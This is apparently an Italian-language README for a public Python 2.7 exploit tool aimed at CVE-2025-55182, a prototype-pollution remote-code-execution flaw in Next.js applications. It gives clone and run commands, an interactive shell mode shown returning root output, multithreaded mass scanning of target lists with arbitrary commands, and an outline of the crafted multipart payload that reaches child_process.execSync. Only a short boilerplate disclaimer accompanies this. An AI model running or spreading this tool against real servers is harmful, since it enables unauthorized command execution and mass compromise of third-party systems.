
Strumento di exploit per CVE-2025-55182 – exploit in Python 2.7 per la prototype pollution di Next.js che porta a RCE
Un exploit in Python 2.7 per CVE-2025-55182 – una vulnerabilità critica di prototype pollution / RCE nelle applicazioni Next.js.
Questo strumento consente sia shell interattiva su singolo bersaglio che scansione di massa di più host con multithreading, output colorato e fallback HTTPS automatico.
https:// se non viene fornito alcun protocolloid con qualsiasi comando (whoami, ls, ecc.)requests (facilmente installabile)requests – installala con:
pip install requests
· Un terminale che supporti i colori ANSI (la maggior parte dei terminali Linux/macOS, Windows Terminal, PowerShell)
📦 Installazione
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests
Rendi eseguibile lo script (opzionale):
chmod +x CVE-2025-55182.py
🎯 Utilizzo
python2 CVE-2025-55182.py https://target.com
oppure senza protocollo (HTTPS viene aggiunto automaticamente):
python2 CVE-2025-55182.py target.com
Una volta connessi e verificato che il bersaglio è vulnerabile, ottieni un prompt di shell:
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root
$ ls -la
...
Comandi integrati:
· exit / quit – chiude la shell · clear – pulisce lo schermo · help – mostra l'aiuto
Prepara un file con un bersaglio per riga (con o senza http/https):
targets.txt
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org
Esegui la scansione di massa (valori predefiniti: 10 thread, comando id, output res.txt):
python2 CVE-2025-55182.py targets.txt
Personalizza thread, comando, file di output:
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
· 20 – numero di thread · whoami – comando da eseguire su ogni bersaglio vulnerabile · results.txt – file di output (vengono salvate solo le voci vulnerabili)
Esempio di output della scansione di massa:
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt
[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
Status: 303
Output: uid=0(root) gid=0(root) groups=0(root)
[-] NOT VULNERABLE: https://example.com
...
Risultati salvati (res.txt):
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
🧪 Come funziona
L'exploit invia una richiesta multipart/form-data appositamente costruita a un endpoint Next.js (/login viene aggiunto se il percorso è vuoto). Sfrutta la prototype pollution (proto:then e constructor:constructor) per iniettare un prefisso dannoso che esegue un comando di sistema usando child_process.execSync().
Il server risponde con un redirect 303 contenente l'output del comando nell'header x-action-redirect (o in Location). Lo strumento estrae il risultato da /login?a=.
🛡️ Disclaimer
Questo strumento è destinato esclusivamente a scopi educativi e a test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo software. Devi avere un'autorizzazione esplicita e scritta dal proprietario del sistema di destinazione prima di utilizzare questo exploit.
Per ulteriori dichiarazioni, puoi consultare il disclaimer sulla copertina di Jenderal92. Puoi verificarlo QUI !!!